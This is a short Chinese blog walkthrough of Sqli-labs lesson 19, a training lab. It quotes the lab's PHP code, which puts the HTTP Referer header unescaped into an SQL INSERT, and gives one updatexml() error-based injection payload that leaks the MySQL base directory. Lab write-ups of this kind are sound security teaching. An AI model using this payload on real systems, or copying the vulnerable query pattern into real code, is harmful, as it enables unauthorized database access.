Sqli-labs Less-19 Referer注入 updatexml()报错注入

 
更多

从源代码中我们可以看到我们获取到的是HTTP_REFERER

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
echo 'Your Referer is: ' .$uagent;
print_r(mysql_error());			

那和less18是基本一致的,我们从referer进行修改。

还是像less18一样,我们只给出一个示例

将referer修改为

1′ and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and ‘1’=’1

可以看到mysql的路径了。

请发散思维思考其他的呦。

 

参考:https://www.cnblogs.com/lcamry/p/5763029.html

 

打赏

本文固定链接: https://www.cxy163.net/archives/4983 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-19 Referer注入 updatexml()报错注入 | 绝缘体
关键字: , , , ,

Sqli-labs Less-19 Referer注入 updatexml()报错注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter